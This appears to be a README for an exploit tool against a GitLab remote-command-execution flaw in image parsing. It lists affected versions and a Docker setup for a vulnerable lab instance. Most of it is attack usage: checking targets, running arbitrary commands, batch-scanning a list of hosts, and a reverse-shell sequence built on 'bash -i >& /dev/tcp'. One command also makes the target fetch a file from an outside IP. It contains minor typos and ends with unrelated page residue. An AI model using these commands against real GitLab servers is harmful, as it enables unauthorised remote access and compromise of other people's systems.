Vuln Impact
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Vuln Product
- Gitlab CE/EE < 13.10.3
- Gitlab CE/EE < 13.9.6
- Gitlab CE/EE < 13.8.8
Environment
export GITLAB_HOME=/srv/gitlab
sudo docker run --detach \
--hostname gitlab.example.com \
--publish 443:443 --publish 80:80 \
--name gitlab \
--restart always \
--volume $GITLAB_HOME/config:/etc/gitlab \
--volume $GITLAB_HOME/logs:/var/log/gitlab \
--volume $GITLAB_HOME/data:/var/opt/gitlab \
gitlab/gitlab-ce:13.9.1-ce.0
Vunl Check
Basic usage
python3 CVE-2021-2205.py
Vuln check
python3 CVE-2021-2205.py -v true -t http://gitlab.example.com
command execute
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"
batch scan
python3 CVE-2021-2205.py -s true -f target.txt
Reserve Shell
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"
Reference
https://github.com/mr-r3bot/Gitlab-CVE-2021-22205
https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
8 Jul 05, 2022
1 Dec 13, 2021
27 Dec 06, 2022
16 Aug 30, 2022
11 Sep 04, 2022
2 Nov 29, 2021
1 Nov 02, 2021
87 Dec 31, 2022
37 Nov 09, 2022
13 Nov 09, 2022
16 Sep 06, 2022
37 Nov 12, 2022
9 Dec 30, 2022
1 Dec 21, 2021
133 Dec 18, 2022
47 Sep 22, 2022
84 Sep 09, 2022
5 Nov 09, 2022
109 Dec 28, 2022
96 Jan 02, 2023